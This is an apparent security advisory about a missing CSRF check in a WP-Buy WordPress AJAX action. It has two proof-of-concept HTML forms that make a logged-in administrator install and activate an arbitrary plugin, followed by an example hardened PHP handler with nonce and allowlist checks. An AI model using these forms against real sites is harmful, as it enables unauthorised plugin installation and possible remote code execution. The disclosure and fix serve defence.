The "cp_plugins_do_button_job_later_callback" AJAX action, present in multiple plugins from the vendor WP-Buy, lacked a CSRF check, allowing attackers to make a logged-in administrator install and activate arbitrary plugins (including a specific version) from the WordPress repository, which could lead to more critical vulnerabilities such as RCE.
Installation:

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="do_button_job_later" />
      <input type="hidden" name="slug" value="wpscan.1.14.4" />
      <input type="submit" name="submit" value="submit" />
    </form>
  </body>
</html>

Activation:

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="do_button_job_later" />
      <input type="hidden" name="plugin_file" value="wpscan/wpscan.php" />
      <input type="submit" name="submit" value="submit" />
    </form>
  </body>
</html>
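What a hardened handler for this action could look like, as an added example that is not the vendor's code or patch. It takes the action name, callback name and the slug and plugin_file parameters from this advisory; the nonce action 'cp_plugins_job', the 'nonce' field and the allowlist entries are assumptions made for illustration.

```php
<?php
// Added example: hypothetical hardened handler, not the vendor's actual fix.
// Assumed: nonce action 'cp_plugins_job', POST field 'nonce', allowlist contents.
const CP_ALLOWED_PLUGINS = array(
    // slug => main plugin file (placeholder entry)
    'example-plugin' => 'example-plugin/example-plugin.php',
);

// Registered for logged-in users only; no wp_ajax_nopriv_ hook.
add_action( 'wp_ajax_do_button_job_later', 'cp_plugins_do_button_job_later_callback' );

function cp_plugins_do_button_job_later_callback() {
    // CSRF check: dies with HTTP 403 unless a valid nonce is present.
    check_ajax_referer( 'cp_plugins_job', 'nonce' );
    require_once ABSPATH . 'wp-admin/includes/plugin.php';

    if ( isset( $_POST['plugin_file'] ) ) {            // activation branch
        if ( ! current_user_can( 'activate_plugins' ) ) {
            wp_send_json_error( 'forbidden', 403 );
        }
        $file = sanitize_text_field( wp_unslash( $_POST['plugin_file'] ) );
        // Only plugin files on the allowlist may be activated.
        if ( ! in_array( $file, CP_ALLOWED_PLUGINS, true ) ) {
            wp_send_json_error( 'plugin not allowed', 400 );
        }
        $result = activate_plugin( $file );
        is_wp_error( $result )
            ? wp_send_json_error( $result->get_error_message(), 500 )
            : wp_send_json_success();
    }

    if ( isset( $_POST['slug'] ) ) {                   // installation branch
        if ( ! current_user_can( 'install_plugins' ) ) {
            wp_send_json_error( 'forbidden', 403 );
        }
        // sanitize_key() strips dots, so "name.version" slugs never match.
        $slug = sanitize_key( wp_unslash( $_POST['slug'] ) );
        if ( ! array_key_exists( $slug, CP_ALLOWED_PLUGINS ) ) {
            wp_send_json_error( 'plugin not allowed', 400 );
        }
        require_once ABSPATH . 'wp-admin/includes/plugin-install.php';
        require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
        $api = plugins_api( 'plugin_information', array( 'slug' => $slug ) );
        if ( is_wp_error( $api ) ) {
            wp_send_json_error( $api->get_error_message(), 500 );
        }
        $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
        true === $upgrader->install( $api->download_link )
            ? wp_send_json_success()
            : wp_send_json_error( 'install failed', 500 );
    }
    wp_send_json_error( 'bad request', 400 );
}
```

The admin page that triggers the request must embed a nonce created with wp_create_nonce( 'cp_plugins_job' ) and send it in the 'nonce' field; a cross-site form like the ones above cannot supply it.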
2021-04-22